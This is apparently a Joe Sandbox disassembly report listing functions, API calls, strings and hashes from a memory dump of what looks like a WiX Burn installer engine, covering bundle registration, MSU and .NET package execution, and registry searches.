String ID: Catalog$CertificateRootPublicKeyIdentifier$CertificateRootThumbprint$Container$DownloadUrl$Failed to allocate memory for payload structs.$Failed to find catalog.$Failed to get @Catalog.$Failed to get @CertificateRootPublicKeyIdentifier.$Failed to get @CertificateRootThumbprint.$Failed to get @Container.$Failed to get @DownloadUrl.$Failed to get @FilePath.$Failed to get @FileSize.$Failed to get @Hash.$Failed to get @Id.$Failed to get @LayoutOnly.$Failed to get @Packaging.$Failed to get @SourcePath.$Failed to get next node.$Failed to get payload node count.$Failed to hex decode @CertificateRootPublicKeyIdentifier.$Failed to hex decode @CertificateRootThumbprint.$Failed to hex decode the Payload/@Hash.$Failed to parse @FileSize.$Failed to select payload nodes.$Failed to to find container: %ls$FilePath$FileSize$Hash$Invalid value for @Packaging: %ls$LayoutOnly$Packaging$Payload$SourcePath$cabinet.dll$comres.dll$download$embedded$external$feclient.dll$msasn1.dll$msi.dll$payload.cpp$version.dll$wininet.dll
API String ID: 1171520630-1949177747
Opcode ID: 16cde6f5850373e5620cca8fd218a9e3172f192dc187bd08f5125bdb80ad7057
Instruction ID: 87176bd9afada9e3796f30099dbadb33c42ac4279f381c6fc349f8ff069e7ebd
Opcode Fuzzy Hash: 16cde6f5850373e5620cca8fd218a9e3172f192dc187bd08f5125bdb80ad7057
Instruction Fuzzy Hash: 2CC1E972D81726BBDF219A54CC01FADB764AF04760F108267FA11BB291C7759E01E7A1

Function 0009FE26 Relevance: 81.0, APIs: 1, Strings: 45, Instructions: 476registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000101,?,?,00020006,00000000,?,?,?), ref: 000A0409

Strings

/modify, xrefs: 000A02E1, 000A02E9
Contact, xrefs: 000A01CA, 000A01DD
"%ls" /modify, xrefs: 000A0218
3.10.4.4718, xrefs: 0009FFE2
Failed to register the bundle dependency key., xrefs: 000A03BC
%hu.%hu.%hu.%hu, xrefs: 0009FF85
BundleAddonCode, xrefs: 0009FF07, 0009FF0F
BundleTag, xrefs: 0009FFCA, 0009FFCF
ParentKeyName, xrefs: 000A017A, 000A018D
BundleUpgradeCode, xrefs: 0009FEE9, 0009FEF1
DisplayName, xrefs: 000A0043, 000A0056
EstimatedSize, xrefs: 000A0385, 000A038A, 000A0399
QuietUninstallString, xrefs: 000A02B5, 000A02CB
Failed to write software tags., xrefs: 000A032E
"%ls" /uninstall /quiet, xrefs: 000A02B0
URLInfoAbout, xrefs: 000A010E, 000A0121
Comments, xrefs: 000A01A2, 000A01B5
HelpTelephone, xrefs: 000A00E8, 000A00FB
Failed to create registration key., xrefs: 0009FEAE
BundleVersion, xrefs: 0009FF61, 0009FF8A
BundleCachePath, xrefs: 0009FECE, 0009FED3
Failed to update resume mode., xrefs: 000A03D6
BundlePatchCode, xrefs: 0009FF43, 0009FF4B
Publisher, xrefs: 000A009C, 000A00AF
HelpLink, xrefs: 000A00C2, 000A00D5
ParentDisplayName, xrefs: 000A015A, 000A016D
/uninstall, xrefs: 000A02DC
ModifyPath, xrefs: 000A021D, 000A0233
"%ls" %ls, xrefs: 000A02ED
NoElevateOnModify, xrefs: 000A023F, 000A0252
DisplayVersion, xrefs: 000A0069, 000A007C
SystemComponent, xrefs: 000A0290, 000A02A3
Failed to write %ls value., xrefs: 000A039A
Failed to cache bundle from path: %ls, xrefs: 0009FE81
BundleProviderKey, xrefs: 0009FFA9, 0009FFAE
NoRemove, xrefs: 000A026B, 000A027E
Failed to write update registration., xrefs: 000A034E
%hs, xrefs: 0009FFE7
EngineVersion, xrefs: 0009FFEC, 0009FFF1
BundleDetectCode, xrefs: 0009FF25, 0009FF2D
UninstallString, xrefs: 000A02F2, 000A0308
URLUpdateInfo, xrefs: 000A0134, 000A0147
DisplayIcon, xrefs: 000A000A, 000A0014
NoModify, xrefs: 000A01F3, 000A0206
%s,0, xrefs: 000A000F

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: Close
String ID: /uninstall$"%ls" %ls$"%ls" /modify$"%ls" /uninstall /quiet$%hs$%hu.%hu.%hu.%hu$%s,0$/modify$3.10.4.4718$BundleAddonCode$BundleCachePath$BundleDetectCode$BundlePatchCode$BundleProviderKey$BundleTag$BundleUpgradeCode$BundleVersion$Comments$Contact$DisplayIcon$DisplayName$DisplayVersion$EngineVersion$EstimatedSize$Failed to cache bundle from path: %ls$Failed to create registration key.$Failed to register the bundle dependency key.$Failed to update resume mode.$Failed to write %ls value.$Failed to write software tags.$Failed to write update registration.$HelpLink$HelpTelephone$ModifyPath$NoElevateOnModify$NoModify$NoRemove$ParentDisplayName$ParentKeyName$Publisher$QuietUninstallString$SystemComponent$URLInfoAbout$URLUpdateInfo$UninstallString
API String ID: 3535843008-3978993339
Opcode ID: 00cf49b284159ffc1414fe7f235935b89d7484e787505d6b5376c3999a6987b6
Instruction ID: f88a96b26a5db5aeaaad6bd00f4a136be4727cd16335d5e7aaa8c0b1c62a4bd0
Opcode Fuzzy Hash: 00cf49b284159ffc1414fe7f235935b89d7484e787505d6b5376c3999a6987b6
Instruction Fuzzy Hash: 01F1C532A40B6AFFDF225695CD02FED76A9BF01750F044261F900BA652D7F1AE60A7D0

Function 0009834D Relevance: 61.6, APIs: 5, Strings: 30, Instructions: 331COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,00000000,80070490,?,?,?,?,?,?,?,=S,000BBF87,?,?,?), ref: 0009837E
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,=S,000BBF87,?,?,?,?,=S,Chain), ref: 000986DB

Strings

Persisted, xrefs: 00098421
numeric, xrefs: 00098493
Failed to insert variable '%ls'., xrefs: 0009859D
Failed to get @Persisted., xrefs: 000986B8
Failed to get @Value., xrefs: 0009866D
Initializing hidden variable '%ls', xrefs: 00098548
variable.cpp, xrefs: 00098690
=S, xrefs: 0009834D
Initializing version variable '%ls' to value '%ls', xrefs: 0009852A
Invalid value for @Type: %ls, xrefs: 0009864F
Failed to get variable node count., xrefs: 000983B8
Failed to change variant type., xrefs: 000986B1
Failed to find variable value '%ls'., xrefs: 000986A9
Initializing numeric variable '%ls' to value '%ls', xrefs: 000984B9
Failed to get @Type., xrefs: 0009865F
Initializing string variable '%ls' to value '%ls', xrefs: 000984F1
Attempt to set built-in variable value: %ls, xrefs: 0009869F
Value, xrefs: 0009843C
Failed to get next node., xrefs: 000986CD
Failed to set variant encryption, xrefs: 00098674
Failed to get @Hidden., xrefs: 000986BF
Type, xrefs: 0009847A
version, xrefs: 00098503
Variable, xrefs: 00098388
Failed to set value of variable: %ls, xrefs: 0009867E
Failed to get @Id., xrefs: 000986C6
Failed to select variable nodes., xrefs: 0009839B
Hidden, xrefs: 00098406
Failed to set variant value., xrefs: 00098666
string, xrefs: 000984CE

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: =S$Attempt to set built-in variable value: %ls$Failed to change variant type.$Failed to find variable value '%ls'.$Failed to get @Hidden.$Failed to get @Id.$Failed to get @Persisted.$Failed to get @Type.$Failed to get @Value.$Failed to get next node.$Failed to get variable node count.$Failed to insert variable '%ls'.$Failed to select variable nodes.$Failed to set value of variable: %ls$Failed to set variant encryption$Failed to set variant value.$Hidden$Initializing hidden variable '%ls'$Initializing numeric variable '%ls' to value '%ls'$Initializing string variable '%ls' to value '%ls'$Initializing version variable '%ls' to value '%ls'$Invalid value for @Type: %ls$Persisted$Type$Value$Variable$numeric$string$variable.cpp$version
API String ID: 3168844106-1768023205
Opcode ID: 6e5ec184893e61039701cb556e4c89599c03da52a39c5f338afedef6e6e6b40a
Instruction ID: d48a49cbf146627be196faa4b44cc3cd8436765ff4a4ff42a542ca1498a157cd
Opcode Fuzzy Hash: 6e5ec184893e61039701cb556e4c89599c03da52a39c5f338afedef6e6e6b40a
Instruction Fuzzy Hash: D6B1D472D4031ABBDF219B94CC05EEEBB75AF45710F118256FA04BB391CB719A00EBA1

Function 000B6A85 Relevance: 58.1, APIs: 7, Strings: 26, Instructions: 377COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,000ABBCA,00000007,?,?,?), ref: 000B6AD9

Part of subcall function 000D09BB: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,00095D8F,00000000), ref: 000D09CF
Part of subcall function 000D09BB: GetProcAddress.KERNEL32(00000000), ref: 000D09D6
Part of subcall function 000D09BB: GetLastError.KERNEL32(?,?,?,00095D8F,00000000), ref: 000D09ED

CloseHandle.KERNEL32(00000000,?,000001F4,?,?,?,?,?,?,?,?,?,?,wusa.exe,?,00000025), ref: 000B6EC9
CloseHandle.KERNEL32(00000000,?,000001F4,?,?,?,?,?,?,?,?,?,?,wusa.exe,?,00000025), ref: 000B6EDD

Strings

"%ls" /uninstall /kb:%ls /quiet /norestart, xrefs: 000B6C2E
2, xrefs: 000B6D6C
Failed to find System32 directory., xrefs: 000B6B4E
wusa.exe, xrefs: 000B6B59
Failed to allocate WUSA.exe path., xrefs: 000B6B6C
Failed to find Windows directory., xrefs: 000B6B18
Failed to append log path to MSU command-line., xrefs: 000B6C8D
msuengine.cpp, xrefs: 000B6D46, 000B6DDB, 000B6E03
Failed to get process exit code., xrefs: 000B6DE5
Bootstrapper application aborted during MSU progress., xrefs: 000B6E0D
Failed to CreateProcess on path: %ls, xrefs: 000B6D53
Failed to append SysNative directory., xrefs: 000B6B36
Failed to format MSU install command., xrefs: 000B6C15
D, xrefs: 000B6CF4
Failed to get action arguments for MSU package., xrefs: 000B6B8F
Failed to wait for executable to complete: %ls, xrefs: 000B6E58
Failed to ensure WU service was enabled to install MSU package., xrefs: 000B6CE7
Failed to format MSU uninstall command., xrefs: 000B6C42
/log:, xrefs: 000B6C5B
Failed to append log switch to MSU command-line., xrefs: 000B6C6F
"%ls" "%ls" /quiet /norestart, xrefs: 000B6C01
SysNative\, xrefs: 000B6B23
Failed to build MSU path., xrefs: 000B6BEE
WixBundleExecutePackageCacheFolder, xrefs: 000B6BC4, 000B6EF5
Failed to determine WOW64 status., xrefs: 000B6AEB
Failed to get cached path for package: %ls, xrefs: 000B6BB5

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: Handle$Close$AddressCurrentErrorLastModuleProcProcess
String ID: /log:$"%ls" "%ls" /quiet /norestart$"%ls" /uninstall /kb:%ls /quiet /norestart$2$Bootstrapper application aborted during MSU progress.$D$Failed to CreateProcess on path: %ls$Failed to allocate WUSA.exe path.$Failed to append SysNative directory.$Failed to append log path to MSU command-line.$Failed to append log switch to MSU command-line.$Failed to build MSU path.$Failed to determine WOW64 status.$Failed to ensure WU service was enabled to install MSU package.$Failed to find System32 directory.$Failed to find Windows directory.$Failed to format MSU install command.$Failed to format MSU uninstall command.$Failed to get action arguments for MSU package.$Failed to get cached path for package: %ls$Failed to get process exit code.$Failed to wait for executable to complete: %ls$SysNative\$WixBundleExecutePackageCacheFolder$msuengine.cpp$wusa.exe
API String ID: 1400713077-4261965642
Opcode ID: 4dabeef21908e7ecea1f354afb12601f89d6c0535f21ad68cc7893a9cf7ba37f
Instruction ID: 633f2e427929888e876b421121d4ac313ea98f4ccbf89fe9ceb90b15eef3a081
Opcode Fuzzy Hash: 4dabeef21908e7ecea1f354afb12601f89d6c0535f21ad68cc7893a9cf7ba37f
Instruction Fuzzy Hash: 47D17175A0031AAFDF119FE5CC85EEEBBB8EF04704F104026B615F61A2D7BA9D409B61

Function 000A52E3 Relevance: 52.7, APIs: 17, Strings: 13, Instructions: 222filepipesleepCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,00000000,?,000DB4F0,?,00000000,?,0009442A,?,000DB4F0), ref: 000A5304
GetCurrentProcessId.KERNEL32(?,0009442A,?,000DB4F0), ref: 000A530F
SetNamedPipeHandleState.KERNEL32(?,000000FF,00000000,00000000,?,0009442A,?,000DB4F0), ref: 000A5346
ConnectNamedPipe.KERNEL32(?,00000000,?,0009442A,?,000DB4F0), ref: 000A535B
GetLastError.KERNEL32(?,0009442A,?,000DB4F0), ref: 000A5365
Sleep.KERNEL32(00000064,?,0009442A,?,000DB4F0), ref: 000A5396
SetNamedPipeHandleState.KERNEL32(?,00000000,00000000,00000000,?,0009442A,?,000DB4F0), ref: 000A53B9
WriteFile.KERNEL32(?,crypt32.dll,00000004,00000000,00000000,?,0009442A,?,000DB4F0), ref: 000A53D4
WriteFile.KERNEL32(?,*D,000DB4F0,00000000,00000000,?,0009442A,?,000DB4F0), ref: 000A53EF
WriteFile.KERNEL32(?,comres.dll,00000004,feclient.dll,00000000,?,0009442A,?,000DB4F0), ref: 000A540A
ReadFile.KERNEL32(?,wininet.dll,00000004,feclient.dll,00000000,?,0009442A,?,000DB4F0), ref: 000A5425
GetLastError.KERNEL32(?,0009442A,?,000DB4F0), ref: 000A547D
GetLastError.KERNEL32(?,0009442A,?,000DB4F0), ref: 000A54B1
GetLastError.KERNEL32(?,0009442A,?,000DB4F0), ref: 000A54E5
GetLastError.KERNEL32(?,0009442A,?,000DB4F0), ref: 000A557B

Strings

Failed to write our process id to pipe., xrefs: 000A54DB
Failed to read ACK from pipe., xrefs: 000A54A7
*D, xrefs: 000A53EB
comres.dll, xrefs: 000A5408
Failed to reset pipe to blocking., xrefs: 000A5574
Failed to write secret length to pipe., xrefs: 000A5543
Failed to wait for child to connect to pipe., xrefs: 000A5473
feclient.dll, xrefs: 000A5402, 000A541D
wininet.dll, xrefs: 000A5423
crypt32.dll, xrefs: 000A53D2
Failed to write secret to pipe., xrefs: 000A550F
Failed to set pipe to non-blocking., xrefs: 000A55A5
pipe.cpp, xrefs: 000A5469, 000A549D, 000A54D1, 000A5505, 000A5539, 000A556A, 000A559B

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: ErrorLast$File$NamedPipeWrite$HandleState$ConnectCurrentProcessReadSleeplstrlen
String ID: *D$Failed to read ACK from pipe.$Failed to reset pipe to blocking.$Failed to set pipe to non-blocking.$Failed to wait for child to connect to pipe.$Failed to write our process id to pipe.$Failed to write secret length to pipe.$Failed to write secret to pipe.$comres.dll$crypt32.dll$feclient.dll$pipe.cpp$wininet.dll
API String ID: 2944378912-3473256259
Opcode ID: de6e8c1f2992a95f305cf23c55a41b3de9e29c1831e829291f7ddfa68d87cec5
Instruction ID: ca3cca7b6fed5d26f99b0fb9f0fbc21d8050d631fac21587cca2cec979c195a3
Opcode Fuzzy Hash: de6e8c1f2992a95f305cf23c55a41b3de9e29c1831e829291f7ddfa68d87cec5
Instruction Fuzzy Hash: 4261A9B2E40725AAFB209AF5CC49BEEB6E8AF04741F114125FE05FB190D764CE4086F5

Function 000D72F4 Relevance: 45.8, APIs: 13, Strings: 13, Instructions: 340COMMON

Download Yara Rule

APIs

Part of subcall function 000938D4: GetProcessHeap.KERNEL32(?,000001C7,?,00092284,000001C7,00000001,80004005,8007139F,?,?,000D015F,8007139F,?,00000000,00000000,8007139F), ref: 000938E5
Part of subcall function 000938D4: RtlAllocateHeap.NTDLL(00000000,?,00092284,000001C7,00000001,80004005,8007139F,?,?,000D015F,8007139F,?,00000000,00000000,8007139F), ref: 000938EC

CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,generator,000000FF,?,?,?), ref: 000D7407
SysFreeString.OLEAUT32(00000000), ref: 000D75D0
SysFreeString.OLEAUT32(00000000), ref: 000D766D

Strings

generator, xrefs: 000D73FA
title, xrefs: 000D7492
icon, xrefs: 000D741E
@, xrefs: 000D7576
subtitle, xrefs: 000D7476
author, xrefs: 000D7345, 000D74D6
(, xrefs: 000D75AB
logo, xrefs: 000D745A
entry, xrefs: 000D737F, 000D7548
atomutil.cpp, xrefs: 000D7321, 000D7657
category, xrefs: 000D7362, 000D750F
link, xrefs: 000D739C, 000D757E
updated, xrefs: 000D74AE

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: String$FreeHeap$AllocateCompareProcess
String ID: ($@$atomutil.cpp$author$category$entry$generator$icon$link$logo$subtitle$title$updated
API String ID: 1555028553-2592408802
Opcode ID: cd0ce9c93f902ccd17b66be0f889130526b12f6b4fdcdd07190526fa2ef754fb
Instruction ID: 57aa4c6945ed51824984a76b0259655133e815e314af911d647bb2d6ae2f96b1
Opcode Fuzzy Hash: cd0ce9c93f902ccd17b66be0f889130526b12f6b4fdcdd07190526fa2ef754fb
Instruction Fuzzy Hash: B7B18431948716BBCB219B58CC41FAE76B4AF04720F600356F629AA7D1E771EE40DBA1

Function 000D6FB7 Relevance: 45.8, APIs: 11, Strings: 15, Instructions: 298COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,000F3C78,000000FF,?,?,?), ref: 000D707E
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,summary,000000FF), ref: 000D70A3
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,title,000000FF), ref: 000D70C3
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,published,000000FF), ref: 000D70DF
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,updated,000000FF), ref: 000D7107
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,author,000000FF), ref: 000D7123
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,category,000000FF), ref: 000D715C
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,content,000000FF), ref: 000D7195

Part of subcall function 000D6BF6: SysFreeString.OLEAUT32(00000000), ref: 000D6D2F
Part of subcall function 000D6BF6: SysFreeString.OLEAUT32(00000000), ref: 000D6D71

SysFreeString.OLEAUT32(00000000), ref: 000D7219
SysFreeString.OLEAUT32(00000000), ref: 000D72C9

Strings

(, xrefs: 000D71F4
title, xrefs: 000D70B5
summary, xrefs: 000D7095
author, xrefs: 000D6FE2, 000D7115
msi.dll, xrefs: 000D6FE1
version.dll, xrefs: 000D6FDD
published, xrefs: 000D70D1
atomutil.cpp, xrefs: 000D72B6
feclient.dll, xrefs: 000D70B0
category, xrefs: 000D6FFF, 000D714E
link, xrefs: 000D701C, 000D71C7
content, xrefs: 000D7187
cabinet.dll, xrefs: 000D6FFA
clbcatq.dll, xrefs: 000D70EC
updated, xrefs: 000D70F9

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: String$Compare$Free
String ID: ($atomutil.cpp$author$cabinet.dll$category$clbcatq.dll$content$feclient.dll$link$msi.dll$published$summary$title$updated$version.dll
API String ID: 318886736-4294603148
Opcode ID: 00649ee1a8c316535cee887c22a2e0e61fad1f01a35122053f20c20ff73574db
Instruction ID: 33644199bc2cc00c77cdd1319760c7534ac5a1f4f1ad65c87ae5ba5e21c45f2f
Opcode Fuzzy Hash: 00649ee1a8c316535cee887c22a2e0e61fad1f01a35122053f20c20ff73574db
Instruction Fuzzy Hash: D8A1713194831ABBDB219B94CC41FBDB774AF04720F204356F629AA2D1E771EA50DBA0

Function 0009A311 Relevance: 44.0, APIs: 8, Strings: 17, Instructions: 299registryCOMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 0009A356
_MREFOpen@16.MSPDB140-MSVCRT ref: 0009A37C
RegCloseKey.ADVAPI32(00000000,?,00000000,?,?,?,?,?), ref: 0009A666

Strings

Failed to open registry key., xrefs: 0009A3E9
RegistrySearchValue failed: ID '%ls', HRESULT 0x%x, xrefs: 0009A63E
Failed to format value string., xrefs: 0009A387
Failed to get expand environment string., xrefs: 0009A5DB
Registry value not found. Key = '%ls', Value = '%ls', xrefs: 0009A418
Failed to query registry key value size., xrefs: 0009A454
Failed to format key string., xrefs: 0009A361
Failed to allocate string buffer., xrefs: 0009A565
Failed to clear variable., xrefs: 0009A3D4
Failed to read registry value., xrefs: 0009A5F4
Registry key not found. Key = '%ls', xrefs: 0009A3B0
Failed to query registry key value., xrefs: 0009A4D8
Failed to allocate memory registry value., xrefs: 0009A487
Failed to change value type., xrefs: 0009A60D
Unsupported registry key value type. Type = '%u', xrefs: 0009A506
search.cpp, xrefs: 0009A44A, 0009A47D, 0009A4CE, 0009A5D1
Failed to set variable., xrefs: 0009A629

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: Open@16$Close
String ID: Failed to allocate memory registry value.$Failed to allocate string buffer.$Failed to change value type.$Failed to clear variable.$Failed to format key string.$Failed to format value string.$Failed to get expand environment string.$Failed to open registry key.$Failed to query registry key value size.$Failed to query registry key value.$Failed to read registry value.$Failed to set variable.$Registry key not found. Key = '%ls'$Registry value not found. Key = '%ls', Value = '%ls'$RegistrySearchValue failed: ID '%ls', HRESULT 0x%x$Unsupported registry key value type. Type = '%u'$search.cpp
API String ID: 2348241696-3124384294
Opcode ID: ff80a6fd1307eb688a89a1c50adafb6f2d9d03f77fa060e39eacdc953c5e8047
Instruction ID: 1e1ab522a591742cfd3dbfbe4bc1efc8dc007df5732a0824e34555fe23b1db63
Opcode Fuzzy Hash: ff80a6fd1307eb688a89a1c50adafb6f2d9d03f77fa060e39eacdc953c5e8047
Instruction Fuzzy Hash: 7EA1DB72F40715FBDF21AAA4CC45BEE7AA9AF05310F158122FD14BA251D771DE00A7E2

Function 000BD22C Relevance: 44.0, APIs: 10, Strings: 15, Instructions: 276processCOMMON

Download Yara Rule

APIs

UuidCreate.RPCRT4(?), ref: 000BD2A7
StringFromGUID2.OLE32(?,?,00000027), ref: 000BD2D0
CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?,?,?), ref: 000BD3BC
GetLastError.KERNEL32(?,?,?,?), ref: 000BD3C6
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00000064,?,?,?,?), ref: 000BD45B
GetExitCodeProcess.KERNEL32(?,?), ref: 000BD485
GetLastError.KERNEL32(?,?,?,?), ref: 000BD493
GetLastError.KERNEL32(?,?,?,?), ref: 000BD4CB

Part of subcall function 000BD12C: WaitForSingleObject.KERNEL32(?,000000FF,74DF30B0,00000000,?,?,?,?,000BD439,?), ref: 000BD145
Part of subcall function 000BD12C: ReleaseMutex.KERNEL32(?,?,?,?,000BD439,?), ref: 000BD161
Part of subcall function 000BD12C: WaitForSingleObject.KERNEL32(?,000000FF), ref: 000BD1A4
Part of subcall function 000BD12C: ReleaseMutex.KERNEL32(?), ref: 000BD1BB
Part of subcall function 000BD12C: SetEvent.KERNEL32(?), ref: 000BD1C4

CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 000BD580
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 000BD598

Strings

%ls /pipe %ls, xrefs: 000BD373
Failed to create netfx chainer., xrefs: 000BD352
Failed to convert netfx chainer guid into string., xrefs: 000BD2EF
Failed to CreateProcess on path: %ls, xrefs: 000BD3F5
Failed to create netfx chainer guid., xrefs: 000BD2B4
NetFxSection.%ls, xrefs: 000BD2FD
Failed to process netfx chainer message., xrefs: 000BD43F
Failed to get netfx return code., xrefs: 000BD4C1
NetFxChainer.cpp, xrefs: 000BD2E5, 000BD3EA, 000BD4B7, 000BD4EF
NetFxEvent.%ls, xrefs: 000BD31F
Failed to allocate section name., xrefs: 000BD311
Failed to allocate netfx chainer arguments., xrefs: 000BD387
Failed to wait for netfx chainer process to complete, xrefs: 000BD4F9
Failed to allocate event name., xrefs: 000BD333
D, xrefs: 000BD3A1

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: ErrorLastWait$CloseCreateHandleMutexObjectProcessReleaseSingle$CodeEventExitFromMultipleObjectsStringUuid
String ID: %ls /pipe %ls$D$Failed to CreateProcess on path: %ls$Failed to allocate event name.$Failed to allocate netfx chainer arguments.$Failed to allocate section name.$Failed to convert netfx chainer guid into string.$Failed to create netfx chainer guid.$Failed to create netfx chainer.$Failed to get netfx return code.$Failed to process netfx chainer message.$Failed to wait for netfx chainer process to complete$NetFxChainer.cpp$NetFxEvent.%ls$NetFxSection.%ls
API String ID: 2531618940-1825855094
Opcode ID: fbeb9e7b79ce71dc111dcb4dc61ce069f6189d787bcdb1d22160d7f3f92c5ce0
Instruction ID: a59d44e610533e8b666b0f32f3d3e8fe02fc99f8440d5f59e8b415f1074f02c2
Opcode Fuzzy Hash: fbeb9e7b79ce71dc111dcb4dc61ce069f6189d787bcdb1d22160d7f3f92c5ce0
Instruction Fuzzy Hash: 2BA19671D40728ABEB209BA4CC45BEEB7F8AF04710F110066FA09F7252E7759E449FA1

Function 0009567D Relevance: 42.5, APIs: 5, Strings: 19, Instructions: 476stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(000002C0,00000100,00000100,00000000,00000000,?,000999BB,000002C0,?,00000000,00000000,000002C0,00000100,000002C0,00000100), ref: 000956A2
lstrlenW.KERNEL32(00000000,?,000999BB,000002C0,?,00000000,00000000,000002C0,00000100,000002C0,00000100), ref: 000956AC
_wcschr.LIBVCRUNTIME ref: 000958B4
